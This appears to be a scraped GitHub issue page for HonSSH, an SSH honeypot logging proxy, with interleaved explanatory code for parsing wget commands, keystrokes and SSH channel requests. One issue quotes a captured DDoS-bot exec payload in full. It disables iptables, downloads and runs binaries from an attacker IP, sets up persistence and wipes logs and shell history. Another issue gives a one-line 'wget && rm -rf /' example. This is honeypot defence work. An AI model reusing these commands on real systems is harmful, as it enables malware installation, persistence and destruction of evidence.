tnich / honssh
HonSSH is designed to log all SSH communications between a client and server.
Home Page: https://github.com/tnich/honssh
License: BSD 3-Clause "New" or "Revised" License
!!! This project is no longer maintained. !!!
HonSSH
https://github.com/tnich/honssh
Copyright (C) 2016 Thomas Nicholson
HonSSH is designed to be used in conjunction with a high interaction honeypot. HonSSH sits between the attacker and the honeypot and creates two separate SSH connections, one to each side.
Read the wiki - https://github.com/tnich/honssh/wiki
HonSSH is inspired by and partly based on Kippo: https://github.com/desaster/kippo
Parts of this project use the Kippo code, and their copyright remains with Upi Tamminen.
(Feature request by proxy :) )
If I may give a feature request for next version that would be:
- accept any user name (or with the same modulo system with chance =)
- if !root => create an account with the provided user name of the honeypot
- if root => give root access.
Original issue reported on code.google.com by [email protected]
on 21 Oct 2014 at 3:48
Hi,
This is not a problem, just a request for advice.
What would be my best option to work with multiple honeypots behind one honssh
gateway? Can I enter several IP addresses in the honssh config file?
Thank you.
Original issue reported on code.google.com by [email protected]
on 4 Nov 2014 at 11:35
Currently the file download option will look for commands containing "wget" and
run them on the HonSSH box. This is too greedy and needs to only extract the
http link.
e.g. 'wget file && rm -rf /' would be bad.
This will be fixed shortly. Until then, use file_download = false.
Original issue reported on code.google.com by [email protected]
on 16 Feb 2014 at 11:58
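The greedy matching described in the issue above is the classic reason never to hand an attacker's command line to a shell on the gateway. The following is an added example, not HonSSH's own code: it tokenises a captured command with shlex (so quoting is honoured), splits it at shell separators, and returns only the http(s) URLs that appear as arguments to wget, so 'wget file && rm -rf /' yields nothing and nothing is ever executed. The sample command lines and the example.invalid hostname are constructed.

```python
import shlex
from urllib.parse import urlparse

# Shell punctuation that ends one simple command (or starts a redirection).
# A token made only of these characters closes the current segment.
SEPARATOR_CHARS = set("();<>|&")
ALLOWED_SCHEMES = ("http", "https")

# Constructed sample command lines, of the kind a honeypot session log records.
SAMPLE_COMMANDS = [
    "wget http://example.invalid/payload.sh -O /tmp/p.sh",
    "wget file && rm -rf /",
    "cd /tmp; wget -q 'http://example.invalid/a.bin'; chmod +x a.bin",
    "wget ftp://example.invalid/a.bin",
    "curl http://example.invalid/x",
]


def split_segments(command):
    """Tokenise a shell command line and split it into simple commands.

    punctuation_chars=True makes ';', '&&', '||', '|' and redirections their
    own tokens, so 'a;rm' is not treated as a single word.  Unbalanced quotes
    stop tokenisation; whatever was parsed up to that point is returned.
    """
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    segments, current = [], []
    try:
        for tok in lexer:
            if tok and set(tok) <= SEPARATOR_CHARS:
                if current:
                    segments.append(current)
                current = []
            else:
                current.append(tok)
    except ValueError:
        pass  # "No closing quotation": do not guess at the rest
    if current:
        segments.append(current)
    return segments


def extract_wget_urls(command):
    """Return the http(s) URLs given to wget in `command`, never executing it.

    Only segments whose first word is wget are inspected; every other word
    (options, output paths, other commands) is ignored, so a line such as
    'wget file && rm -rf /' yields no URL at all.
    """
    urls = []
    for seg in split_segments(command):
        if not seg or seg[0].rsplit("/", 1)[-1] != "wget":
            continue
        for arg in seg[1:]:
            parsed = urlparse(arg)
            if parsed.scheme in ALLOWED_SCHEMES and parsed.netloc:
                urls.append(arg)
    return urls


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print("%-62s -> %s" % (cmd, extract_wget_urls(cmd)))
```

The URLs returned are data for a separate, non-shell download step (or just for logging); the original command string never reaches subprocess. Python 3.8 or newer is assumed, since that is where punctuation_chars and whitespace_split work together.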
Hi Thomas!
This is not really an issue, it's more of a cosmetic adjustment request :)
When I receive a mail saying something like this,
"""
2014-07-30 01:36:49 - Incoming connection from: 1.2.3.4:46286 -
SSH-2.0-libssh-0.1
2014-07-30 01:36:49 - Successful login - Username:[USER] Password:[PASSWORD]
"""
it would be nice to separate the 'Username:' and '[USER]' with a whitespace.
i.e.:
"""
2014-07-30 01:36:49 - Incoming connection from: 1.2.3.4:46286 -
SSH-2.0-libssh-0.1
2014-07-30 01:36:49 - Successful login - Username: [USER] Password: [PASSWORD]
"""
This would make it a bit more readable.
....Yes, I know I'm crazy picky about these things :P
If you fix it - awesome! If you don't - awesome!
Cheers,
Are
Original issue reported on code.google.com by [email protected]
on 30 Jul 2014 at 8:39
What steps will reproduce the problem?
1. In honssh.cfg, set advanced networking to 'enabled = true'
2. Connect to the honeypot
3. Execute 'w'. The IP address that's shown will be that of the router, not that of the connecting client.
What is the expected output?
When executing 'w' it's expected to see the IP address of the connecting client.
What do you see instead?
The IP address of the internal gateway.
What version of the product are you using?
61a65bf9d5f8
On what operating system?
Ubuntu 12.04 LTS
Please provide any additional information below.
I've noticed this error when attackers have connected and disconnected and was
able to reproduce it with the following steps:
# -- Stopping HonSSH.
#
2014-05-16 19:09:06+0200 [-] Main loop terminated.
2014-05-16 19:09:06+0200 [-] Server Shut Down.
# -- Changing 'enabled = true' to 'enabled = false'
#
2014-05-16 19:09:10+0200 [-] Log opened.
2014-05-16 19:09:10+0200 [-] twistd 11.1.0 (/usr/bin/python 2.7.3) starting up.
2014-05-16 19:09:10+0200 [-] reactor class:
twisted.internet.pollreactor.PollReactor.
2014-05-16 19:09:10+0200 [-] HonsshServerFactory starting on 22
2014-05-16 19:09:10+0200 [-] Starting factory
<honssh.server.HonsshServerFactory instance at 0x2474f80>
2014-05-16 19:09:10+0200 [HonsshSlimClientTransport,client]
SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4
2014-05-16 19:09:10+0200 [HonsshSlimClientTransport,client] Disconnecting with
error, code 10
reason: user closed connection
2014-05-16 19:09:10+0200 [HonsshSlimClientTransport,client] connection lost
2014-05-16 19:09:10+0200 [HonsshSlimClientTransport,client] Stopping factory
<honssh.client.HonsshSlimClientFactory instance at 0x2474f38>
2014-05-16 19:09:27+0200 [honssh.server.HonsshServerFactory] disabling
diffie-hellman-group-exchange because we cannot find moduli file
2014-05-16 19:09:27+0200 [honssh.server.HonsshServerFactory] Advanced
Networking disabled - Using client_addr
2014-05-16 19:09:27+0200 [honssh.server.HonsshServerFactory] Starting factory
<honssh.client.HonsshClientFactory instance at 0x2472b48>
# -- Making a connection to the honeypot
#
2014-05-16 19:09:27+0200 [honssh.server.HonsshServerFactory] CONNECTION_MADE
20140516_190927 11.22.33.44 40181
2014-05-16 19:09:27+0200 [Uninitialized] New client connection
2014-05-16 19:09:27+0200 [HonsshServerTransport,0,11.22.33.44] kex alg, key
alg: diffie-hellman-group1-sha1 ssh-rsa
2014-05-16 19:09:27+0200 [HonsshServerTransport,0,11.22.33.44] outgoing:
aes128-ctr hmac-md5 none
2014-05-16 19:09:27+0200 [HonsshServerTransport,0,11.22.33.44] incoming:
aes128-ctr hmac-md5 none
2014-05-16 19:09:27+0200 [HonsshClientTransport,client] kex alg, key alg:
diffie-hellman-group-exchange-sha1 ssh-rsa
2014-05-16 19:09:27+0200 [HonsshClientTransport,client] outgoing: aes256-ctr
hmac-sha1 none
2014-05-16 19:09:27+0200 [HonsshClientTransport,client] incoming: aes256-ctr
hmac-sha1 none
2014-05-16 19:09:27+0200 [HonsshServerTransport,0,11.22.33.44] NEW KEYS
2014-05-16 19:09:27+0200 [HonsshClientTransport,client] REVERSE
2014-05-16 19:09:27+0200 [HonsshClientTransport,client] NEW KEYS
2014-05-16 19:09:27+0200 [HonsshClientTransport,client] Client Connection
Secured
2014-05-16 19:09:28+0200 [HonsshClientTransport,client] Detected Public Key
authentication - disabling
2014-05-16 19:09:32+0200 [HonsshClientTransport,client] LOGIN_SUCCESSFUL
20140516_190932 11.22.33.44 hostmaster Hosting2014
2014-05-16 19:09:34+0200 [HonsshServerTransport,0,11.22.33.44] Entered command:
w
2014-05-16 19:09:34+0200 [HonsshServerTransport,0,11.22.33.44] COMMAND_ENTERED
20140516_190934 11.22.33.44 w
# -- Output from 'w'
#
$ w
19:09:50 up 4 days, 19:23, 2 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
hostmast pts/0 192.168.192.168 19:09 1.00s 0.23s 0.00s w
2014-05-16 19:09:43+0200 [HonsshServerTransport,0,11.22.33.44] Entered command:
exit
2014-05-16 19:09:43+0200 [HonsshServerTransport,0,11.22.33.44] COMMAND_ENTERED
20140516_190943 11.22.33.44 exit
2014-05-16 19:09:43+0200 [HonsshClientTransport,client] Disconnect received
from the honeypot: 192.168.192.16854
2014-05-16 19:09:43+0200 [HonsshServerTransport,0,11.22.33.44] Disconnect
received from the attacker: 11.22.33.44
2014-05-16 19:09:43+0200 [HonsshServerTransport,0,11.22.33.44] Disconnecting
with error, code 10
reason: user closed connection
2014-05-16 19:09:43+0200 [HonsshServerTransport,0,11.22.33.44] connection lost
2014-05-16 19:09:43+0200 [HonsshServerTransport,0,11.22.33.44] Lost connection
with the attacker: 11.22.33.44
2014-05-16 19:09:44+0200 [HonsshServerTransport,0,11.22.33.44] CONNECTION_LOST
20140516_190944 11.22.33.44
2014-05-16 19:09:44+0200 [HonsshClientTransport,client] connection lost
2014-05-16 19:09:44+0200 [HonsshClientTransport,client] Lost connection with
the honeypot: 192.168.192.16854
2014-05-16 19:09:44+0200 [HonsshClientTransport,client] Stopping factory
<honssh.client.HonsshClientFactory instance at 0x2472b48>
# -- Stopping HonSSH.
#
2014-05-16 19:10:41+0200 [-] Received SIGTERM, shutting down.
2014-05-16 19:10:41+0200 [-] (TCP Port 22 Closed)
2014-05-16 19:10:41+0200 [-] Stopping factory
<honssh.server.HonsshServerFactory instance at 0x2474f80>
2014-05-16 19:10:41+0200 [-] Main loop terminated.
2014-05-16 19:10:41+0200 [-] Server Shut Down.
# -- Changing 'enabled = false' to 'enabled = true'
#
2014-05-16 19:10:43+0200 [-] Log opened.
2014-05-16 19:10:43+0200 [-] twistd 11.1.0 (/usr/bin/python 2.7.3) starting up.
2014-05-16 19:10:43+0200 [-] reactor class:
twisted.internet.pollreactor.PollReactor.
2014-05-16 19:10:43+0200 [-] HonsshServerFactory starting on 22
2014-05-16 19:10:43+0200 [-] Starting factory
<honssh.server.HonsshServerFactory instance at 0x14e8f80>
2014-05-16 19:10:43+0200 [HonsshSlimClientTransport,client]
SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4
2014-05-16 19:10:43+0200 [HonsshSlimClientTransport,client] Disconnecting with
error, code 10
reason: user closed connection
2014-05-16 19:10:43+0200 [HonsshSlimClientTransport,client] connection lost
2014-05-16 19:10:43+0200 [HonsshSlimClientTransport,client] Stopping factory
<honssh.client.HonsshSlimClientFactory instance at 0x14e8f38>
2014-05-16 19:10:47+0200 [honssh.server.HonsshServerFactory] disabling
diffie-hellman-group-exchange because we cannot find moduli file
2014-05-16 19:10:47+0200 [honssh.server.HonsshServerFactory] HonSSH Interface
created
# -- First error
#
2014-05-16 19:10:47+0200 [honssh.server.HonsshServerFactory] Error adding IP
address to HonSSH Interface - Using client_addr: Error: an inet prefix is
expected rather than "11.22.33.45/32".
2014-05-16 19:10:47+0200 [honssh.server.HonsshServerFactory] Starting factory
<honssh.client.HonsshClientFactory instance at 0x14e6b48>
# -- Making a connection to the honeypot
#
2014-05-16 19:10:47+0200 [honssh.server.HonsshServerFactory] CONNECTION_MADE
20140516_191047 11.22.33.44 46251
2014-05-16 19:10:47+0200 [Uninitialized] New client connection
2014-05-16 19:10:47+0200 [HonsshServerTransport,0,11.22.33.44] kex alg, key
alg: diffie-hellman-group1-sha1 ssh-rsa
2014-05-16 19:10:47+0200 [HonsshServerTransport,0,11.22.33.44] outgoing:
aes128-ctr hmac-md5 none
2014-05-16 19:10:47+0200 [HonsshServerTransport,0,11.22.33.44] incoming:
aes128-ctr hmac-md5 none
2014-05-16 19:10:47+0200 [HonsshClientTransport,client] kex alg, key alg:
diffie-hellman-group-exchange-sha1 ssh-rsa
2014-05-16 19:10:47+0200 [HonsshClientTransport,client] outgoing: aes256-ctr
hmac-sha1 none
2014-05-16 19:10:47+0200 [HonsshClientTransport,client] incoming: aes256-ctr
hmac-sha1 none
2014-05-16 19:10:47+0200 [HonsshServerTransport,0,11.22.33.44] NEW KEYS
2014-05-16 19:10:47+0200 [HonsshClientTransport,client] REVERSE
2014-05-16 19:10:47+0200 [HonsshClientTransport,client] NEW KEYS
2014-05-16 19:10:47+0200 [HonsshClientTransport,client] Client Connection
Secured
2014-05-16 19:10:47+0200 [HonsshClientTransport,client] Detected Public Key
authentication - disabling
2014-05-16 19:10:52+0200 [HonsshClientTransport,client] LOGIN_SUCCESSFUL
20140516_191052 11.22.33.44 hostmaster Hosting2014
2014-05-16 19:10:54+0200 [HonsshServerTransport,0,11.22.33.44] Entered command:
w
2014-05-16 19:10:54+0200 [HonsshServerTransport,0,11.22.33.44] COMMAND_ENTERED
20140516_191054 11.22.33.44 w
# -- Output from 'w'
#
$ w
19:11:11 up 4 days, 19:25, 2 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
hostmast pts/0 192.168.192.168 19:11 2.00s 0.24s 0.00s w
2014-05-16 19:11:26+0200 [HonsshServerTransport,0,11.22.33.44] Entered command:
exit
2014-05-16 19:11:26+0200 [HonsshServerTransport,0,11.22.33.44] COMMAND_ENTERED
20140516_191126 11.22.33.44 exit
2014-05-16 19:11:26+0200 [HonsshClientTransport,client] Disconnect received
from the honeypot: 192.168.192.16854
2014-05-16 19:11:26+0200 [HonsshServerTransport,0,11.22.33.44] Disconnect
received from the attacker: 11.22.33.44
2014-05-16 19:11:26+0200 [HonsshServerTransport,0,11.22.33.44] Disconnecting
with error, code 10
reason: user closed connection
2014-05-16 19:11:26+0200 [HonsshServerTransport,0,11.22.33.44] connection lost
2014-05-16 19:11:26+0200 [HonsshServerTransport,0,11.22.33.44] Lost connection
with the attacker: 11.22.33.44
2014-05-16 19:11:28+0200 [HonsshServerTransport,0,11.22.33.44] CONNECTION_LOST
20140516_191128 11.22.33.44
# -- Second error
#
2014-05-16 19:11:28+0200 [HonsshServerTransport,0,11.22.33.44] Error removing
IP address to HonSSH Interface: Error: an inet prefix is expected rather than
"11.22.33.45/32".
2014-05-16 19:11:28+0200 [HonsshServerTransport,0,11.22.33.44] Error removing
POSTROUTING Rule: iptables v1.4.12: host/network `11.22.33.45' not found
Try `iptables -h' or 'iptables --help' for more information.
2014-05-16 19:11:28+0200 [HonsshServerTransport,0,11.22.33.44] Error removing
PREROUTING Rule: iptables v1.4.12: Bad IP address "11.22.33.45"
Try `iptables -h' or 'iptables --help' for more information.
Original issue reported on code.google.com by [email protected]
on 16 May 2014 at 5:40
Currently logs look like this when arrow keys are pressed:
Entered command: wget
google.com\x1b[D\x1b[D\x1b[D\x1b[D\x1b[D\x1b[D\x1b[D\x1b[D\x1b[D\x1b[Dhttp://
Need to support all arrow keys not just up.
ETA: April 5th
Original issue reported on code.google.com by [email protected]
on 30 Mar 2014 at 5:23
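The log line quoted in the issue above is the raw keystroke stream: the attacker typed a hostname, pressed Left ten times and then typed "http://", which no log reader wants to decode by hand. The following is an added example, not HonSSH's own code: a small line-editor emulator that replays the keystrokes and returns the command the shell actually saw. It handles Left/Right, Up/Down (history recall, with a caller-supplied history list), Home/End, Delete and Backspace; the keystroke sample is constructed from the issue's own log line.

```python
ESC = "\x1b"

# Constructed sample: "wget google.com", Left x10, then "http://", as in the
# log line quoted in the issue, first as raw keystrokes and then in the
# backslash-escaped form the text log actually contains.
SAMPLE_RAW = "wget google.com" + "\x1b[D" * 10 + "http://"
SAMPLE_LOG_TEXT = r"wget google.com\x1b[D\x1b[D\x1b[D\x1b[D\x1b[D\x1b[D\x1b[D\x1b[D\x1b[D\x1b[Dhttp://"


def from_log_repr(text):
    """Turn the escaped form written to the text log back into raw keystrokes."""
    return text.encode("latin-1").decode("unicode_escape")


def reconstruct_line(raw, history=None):
    """Replay raw terminal keystrokes into the line the shell received.

    Supports CSI (ESC [ ...) and SS3 (ESC O ...) forms of the arrow keys,
    Home/End, Delete (ESC [ 3 ~) and Backspace (0x7f / 0x08).  Printable
    characters are inserted at the cursor; unknown sequences are dropped.
    Up/Down replace the buffer with the previous/next history entry, the way
    a readline shell does.
    """
    history = list(history or [])
    hist_idx = len(history)          # one past the newest entry = line being typed
    buf, cur, i = [], 0, 0
    while i < len(raw):
        ch = raw[i]
        if ch == ESC and raw[i + 1:i + 2] in ("[", "O"):
            j = i + 2
            if raw[i + 1] == "[":    # CSI: parameters, then a final byte 0x40..0x7e
                while j < len(raw) and not ("@" <= raw[j] <= "~"):
                    j += 1
            if j >= len(raw):
                break                # sequence cut off at end of input
            params, final = raw[i + 2:j], raw[j]
            i = j + 1
            if final == "D":                         # Left
                cur = max(0, cur - 1)
            elif final == "C":                       # Right
                cur = min(len(buf), cur + 1)
            elif final in ("A", "B"):                # Up / Down: recall history
                hist_idx = max(0, hist_idx - 1) if final == "A" else min(len(history), hist_idx + 1)
                buf = list(history[hist_idx]) if hist_idx < len(history) else []
                cur = len(buf)
            elif final == "H":                       # Home
                cur = 0
            elif final == "F":                       # End
                cur = len(buf)
            elif final == "~" and params == "3":     # Delete
                del buf[cur:cur + 1]
            continue
        if ch in ("\x7f", "\x08"):                   # Backspace
            if cur > 0:
                cur -= 1
                del buf[cur]
        elif ch.isprintable():
            buf.insert(cur, ch)
            cur += 1
        i += 1
    return "".join(buf)


if __name__ == "__main__":
    print(reconstruct_line(SAMPLE_RAW))
    print(reconstruct_line(from_log_repr(SAMPLE_LOG_TEXT)))
```

Keeping the raw stream in the log and deriving the edited line from it (rather than storing only the result) preserves evidence of what was typed; both are worth recording.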
Only downloads url2
Original issue reported on code.google.com by [email protected]
on 8 Jun 2014 at 1:15
I have written a small addition to send a mail, after an attacker was logged
which includes the ttylog. Maybe you are interested.
client.py:
.....
# imports needed at the top of client.py, if not already present
# (Python 2 email API, as used by the code below):
import os
import smtplib
import time
from email import Encoders
from email.MIMEBase import MIMEBase
from email.MIMEMultipart import MIMEMultipart
.....
        elif messageNum == 97:
            # SSH_MSG_CHANNEL_CLOSE: the attacker's session is over
            if self.factory.server.isPty:
                ttylog.ttylog_close(self.ttylog_file, time.time())
                if self.factory.server.cfg.get('mail', 'enable') == 'true':
                    # build a multipart message and attach the finished ttylog
                    msg = MIMEMultipart()
                    msg['Subject'] = 'Attacker logged'
                    msg['From'] = self.factory.server.cfg.get('mail', 'from')
                    msg['To'] = self.factory.server.cfg.get('mail', 'to')
                    msg.preamble = 'An attacker was logged'
                    fp = open(self.ttylog_file, 'rb')
                    logdata = MIMEBase('application', "octet-stream")
                    logdata.set_payload(fp.read())
                    fp.close()
                    Encoders.encode_base64(logdata)
                    logdata.add_header('Content-Disposition', 'attachment', filename=os.path.basename(self.ttylog_file))
                    msg.attach(logdata)
                    # unauthenticated SMTP to the host named in the [mail] section
                    s = smtplib.SMTP(self.factory.server.cfg.get('mail', 'host'))
                    s.sendmail(msg['From'], msg['To'], msg.as_string())
                    s.quit()
            txtlog.log(self.txtlog_file, "Lost connection from: %s" % self.factory.server.endIP)
        else:
.....
[mail]
enable = true
host = localhost
from = honssh@honssh
to = [email protected]
Original issue reported on code.google.com by [email protected]
on 1 Mar 2014 at 10:16
Another discovery:
exec-Sessions (message 98 with data = exec) do not get logged. Only
pty-sessions (message 98 with data = pty-req).
Also, message 98 with data = exec should be logged directly to the tty-log as
user input.
Here is a message-example of a DDOS-Bot which attacked my honeypot:
2014-03-01 10:35:01+0100 [HonsshServerTransport,3,116.27.9.0] SERVER:
MessageNum: 98 Encrypted
'\x00\x00\x00\x00\x00\x00\x00\x04exec\x01\x00\x00\x10\x88/etc/init.d/iptables
stop\necho "nameserver 8.8.8.8" >> /etc/resolv.conf\necho "nameserver 8.8.4.4"
>> /etc/resolv.conf\nyum -y install wget\nchmod 7777 / etc\nkillall -9
.IptabLes\nkillall -9 nfsd4\nkillall -9 profild.key\ncd /etc;rm -rf dir
fake.cfg\nkillall -9 nfsd\nkillall -9 DDosl\nkillall -9 lengchao32\nkillall -9
b26\nkillall -9 Bill\nkillall -9 n26\nkillall -9 1\nkillall -9
codelove\nkillall -9 32\nkillall -9 m32\nkillall -9 m64\nkillall -9 64\nkillall
-9 83BOT \nkillall -9 82BOT\nkillall -9 dos64\nkillall -9 dos32\nkillall -9
new6\nkillall -9 new4\nkillall -9 node24\nkillall -9 mimi\nkillall -9
nodeJR-1\nkillall -9 freeBSD\nkillall -9 ksapdd\nkillall -9 kysapdd\nkillall -9
sksapdd\nkillall -9 xsw \nkillall -9 syslogd\nkillall -9 skysapdd\nkillall -9
cupsddd\nkillall -9 ksapd\nkillall -9 atddd\nkillall -9 xfsdxd\ncd /etc;chattr
-i cupsdd\ncd /root; chmod 7777 / etc\nkillall -9 minerd\nkillall -9 0\nkillall
-9 joudckfr\nkillall -9 www\nkillall -9 log\nkillall -9 .IptabLex\nkillall -9
.Mm2\nkillall -9 acpid\nkillall -9 m64 \nkillall -9 ./QQ\nkillall -9
QQ\nkillall -9 g3\nkillall -9 2\nkillall -9 3\nkillall -9 pm\nkillall -9
qweasd\nkillall -9 tangtang\nkillall -9 imap-login\nkillall -9 cupsdd\nkillall
-9 xudp\nkillall -9 txma\nkillall -9 mrdos64.b00\nkillall -9
mrdos32.b00\nkillall -9 kkpklp\nkillall -9 kiilp\nkillall -9 xin1\nkillall -9
jibateng\ncd /root;rm -rf dir nohup.out\ncd /etc;rm -rf dir cupsddd\ncd /etc;rm
-rf dir atddd\ncd /etc;rm -rf dir ksapdd\ncd /etc;rm -rf dir kysapdd\ncd
/etc;rm -rf dir sksapdd\ncd /etc;rm -rf dir skysapdd\ncd /etc;rm -rf dir
xfsdxd\ncd /etc;rm -rf dir fake.cfg\ncd /etc;rm -rf dir cupsddd.*\ncd /etc;rm
-rf dir atddd.*\ncd /etc;rm -rf dir ksapdd.*\ncd /etc;rm -rf dir kysapdd.*\ncd
/etc;rm -rf dir sksapdd.*\ncd /etc;rm -rf dir skysapdd.*\ncd /etc;rm -rf dir
xfsdxd.*\ncd /etc;rm -rf dir cupsdd\ncd /etc;rm -rf dir atdd\ncd /etc;rm -rf
dir ksapd\ncd /etc;rm -rf dir kysapd\ncd /etc;rm -rf dir sksapd\ncd /etc;rm -rf
dir skysapd\ncd /etc;rm -rf dir xfsdx\ncd /etc;rm -rf dir fake.cfg\ncd /etc;rm
-rf dir cupsdd.*\ncd /etc;rm -rf dir atdd.*\ncd /etc;rm -rf dir ksapd.*\ncd
/etc;rm -rf dir kysapd.*\ncd /etc;rm -rf dir sksapd.*\ncd /etc;rm -rf dir
skysapd.*\ncd /etc;rm -rf dir xfsdx.*\ncd /var/spool/cron; rm -rf dir
root.*\ncd /var/spool/cron; rm -rf dir root\ncd /var/spool/cron/crontabs; rm
-rf dir root.*\ncd /var/spool/cron/crontabs; rm -rf dir root\ncd
/var/spool/cron ;wget http://122.224.34.75:8182/root\ncd
/var/spool/cron/crontabs ;wget http://122.224.34.75:8182/root\ncd /etc;wget
http://122.224.34.75:8182/cupsdd\ncd /etc;wget
http://122.224.34.75:8182/ksapdd\ncd /etc;wget
http://122.224.34.75:8182/kysapdd\ncd /etc;wget
http://122.224.34.75:8182/atddd\ncd /etc;wget
http://122.224.34.75:8182/skysapdd\ncd /etc;wget
http://122.224.34.75:8182/sksapdd\ncd /etc;wget
http://122.224.34.75:8182/xfsdxd\ncd /etc;chmod 7777 xfsdxd\ncd /etc;chmod 7777
atddd\ncd /etc;chmod 7777 cupsdd\ncd /etc;chmod 7777 ksapdd\ncd /etc;chmod 7777
kysapdd\ncd /etc;chmod 7777 skysapdd\ncd /etc;chmod 7777 sksapdd\nnohup
/etc/xfsdxd > /dev/null 2>&1&\nnohup /etc/cupsdd > /dev/null 2>&1&\nnohup
/etc/ksapdd > /dev/null 2>&1&\nnohup /etc/kysapdd > /dev/null 2>&1&\nnohup
/etc/atddd > /dev/null 2>&1&\nnohup /etc/skysapdd > /dev/null 2>&1&\nnohup
/etc/sksapdd > /dev/null 2>&1&\necho "cd /etc;./ksapdd" >> /etc/rc.local \necho
"cd /etc;./kysapdd" >> /etc/rc.local \necho "cd /etc;./atddd" >> /etc/rc.local
\necho "cd /etc;./ksapdd" >> /etc/rc.local \necho "cd /etc;./skysapdd" >>
/etc/rc.local \necho "cd /etc;./xfsdxd" >> /etc/rc.local \necho "unset
MAILCHECK" >> /etc/profile\ncd /etc;chattr +i cupsdd\nrm -rf
/root/.bash_history\ntouch /root/.bash_history\nhistory -r\ncd /var/log > dmesg
\ncd /var/log > auth.log \ncd /var/log > alternatives.log \ncd /var/log >
boot.log \ncd /var/log > btmp \ncd /var/log > cron \ncd /var/log > cups \ncd
/var/log > daemon.log \ncd /var/log > dpkg.log \ncd /var/log > faillog \ncd
/var/log > kern.log \ncd /var/log > lastlog\ncd /var/log > maillog \ncd
/var/log > user.log \ncd /var/log > Xorg.x.log \ncd /var/log > anaconda.log
\ncd /var/log > yum.log \ncd /var/log > secure\ncd /var/log > wtmp\ncd /var/log
> utmp \ncd /var/log > messages\ncd /var/log > spooler\ncd /var/log >
sudolog\ncd /var/log > aculog\ncd /var/log > access-log\ncd /root >
.bash_history\nhistory -c\necho
\xcc\xe1\xca\xbe----\xc3\xfc\xc1\xee\xd6\xb4\xd0\xd0\xb3\xc9\xb9\xa6\nsleep 600'
Original issue reported on code.google.com by [email protected]
on 1 Mar 2014 at 1:10
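The dump above starts with the wire layout of SSH_MSG_CHANNEL_REQUEST (RFC 4254 section 5.4): uint32 recipient channel (0), the string "exec" (length 4), the want-reply boolean (0x01), then a length-prefixed command (0x00001088 = 4232 bytes). The following is an added example and not HonSSH's code: a bounds-checked parser that tells exec, shell, pty-req and subsystem requests apart and returns the text an exec request should contribute to the session log, which is what the issue asks for. The sample payloads are constructed with the same layout as the dump, with a harmless command in place of the bot's script.

```python
import struct

SSH_MSG_CHANNEL_REQUEST = 98


def ssh_string(b):
    """Encode bytes as an SSH 'string': uint32 length prefix followed by the bytes."""
    return struct.pack(">I", len(b)) + b


# Constructed sample payloads (everything after the message-number byte):
# uint32 recipient channel, string request type, boolean want-reply, then the
# request-specific fields.
SAMPLE_EXEC = struct.pack(">I", 0) + ssh_string(b"exec") + b"\x01" + ssh_string(b"uname -a")
SAMPLE_PTY = (struct.pack(">I", 0) + ssh_string(b"pty-req") + b"\x01" + ssh_string(b"xterm")
              + struct.pack(">IIII", 80, 24, 0, 0) + ssh_string(b""))
SAMPLE_SHELL = struct.pack(">I", 0) + ssh_string(b"shell") + b"\x01"


class Reader:
    """Cursor over a payload with bounds-checked readers for SSH wire types."""

    def __init__(self, data):
        self.data, self.pos = data, 0

    def uint32(self):
        if self.pos + 4 > len(self.data):
            raise ValueError("truncated uint32 at offset %d" % self.pos)
        (value,) = struct.unpack_from(">I", self.data, self.pos)
        self.pos += 4
        return value

    def boolean(self):
        if self.pos >= len(self.data):
            raise ValueError("truncated boolean at offset %d" % self.pos)
        value = self.data[self.pos] != 0
        self.pos += 1
        return value

    def string(self):
        length = self.uint32()
        if self.pos + length > len(self.data):
            raise ValueError("truncated string at offset %d" % self.pos)
        value = self.data[self.pos:self.pos + length]
        self.pos += length
        return value


def parse_channel_request(payload):
    """Decode a CHANNEL_REQUEST payload into a dict suitable for logging."""
    r = Reader(payload)
    info = {"channel": r.uint32()}
    info["type"] = r.string().decode("ascii", "replace")
    info["want_reply"] = r.boolean()
    if info["type"] == "exec":
        # keep bytes that are not UTF-8 (the dump above ends in some) as escapes
        info["command"] = r.string().decode("utf-8", "backslashreplace")
    elif info["type"] == "pty-req":
        info["term"] = r.string().decode("ascii", "replace")
        info["cols"], info["rows"] = r.uint32(), r.uint32()
    elif info["type"] == "subsystem":
        info["subsystem"] = r.string().decode("ascii", "replace")
    return info


def is_well_formed(payload):
    """True when the payload parses completely, False on a truncated field."""
    try:
        parse_channel_request(payload)
        return True
    except ValueError:
        return False


def ttylog_input_for(messageNum, payload):
    """Text to append to the session log as user input, or None if there is none.

    An exec request is recorded as if its command had been typed at a prompt;
    a shell or pty-req by itself carries no input.
    """
    if messageNum != SSH_MSG_CHANNEL_REQUEST:
        return None
    info = parse_channel_request(payload)
    if info["type"] == "exec":
        return info["command"] + "\n"
    return None


if __name__ == "__main__":
    for sample in (SAMPLE_EXEC, SAMPLE_PTY, SAMPLE_SHELL):
        print(parse_channel_request(sample))
```

Every length read is checked against the buffer before it is used, so a malformed request from the attacker side raises ValueError instead of slicing past the end or being silently misread.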
Hello all. Can you help me with this problem please?
What steps will reproduce the problem?
1. I have installed and configured HonSSH according to the instructions
2. I have run start.sh
3. After that I saw this error (below) in honssh.log, and the honeypot does not
record any activity after SSH login.
2014-03-11 23:38:34+0100 [-] Log opened.
2014-03-11 23:38:34+0100 [-] twistd 12.0.0 (/usr/bin/python 2.7.3) starting up.
2014-03-11 23:38:34+0100 [-] reactor class:
twisted.internet.pollreactor.PollReactor.
2014-03-11 23:38:34+0100 [-] HonsshServerFactory starting on 22
2014-03-11 23:38:34+0100 [-] Starting factory
<honssh.server.HonsshServerFactory instance at 0x7faaba27a5f0>
2014-03-11 23:38:34+0100 [-] Factory starting on 5123
2014-03-11 23:38:34+0100 [-] Starting factory
<twisted.internet.protocol.Factory instance at 0x7faaba27d908>
2014-03-11 23:38:34+0100 [HonsshSlimClientTransport,client]
SSH-2.0-OpenSSH_6.0p1 Debian-4
2014-03-11 23:38:34+0100 [HonsshSlimClientTransport,client] Disconnecting with
error, code 10 reason: user closed connection
2014-03-11 23:38:34+0100 [HonsshSlimClientTransport,client] connection lost
2014-03-11 23:38:34+0100 [HonsshSlimClientTransport,client] Stopping factory
<honssh.client.HonsshSlimClientFactory instance at 0x7faaba27a830>
Thank you for reply.
Original issue reported on code.google.com by [email protected]
on 11 Mar 2014 at 11:11
Hi, I use a local mail server and I don't have SMTP auth enabled. Currently,
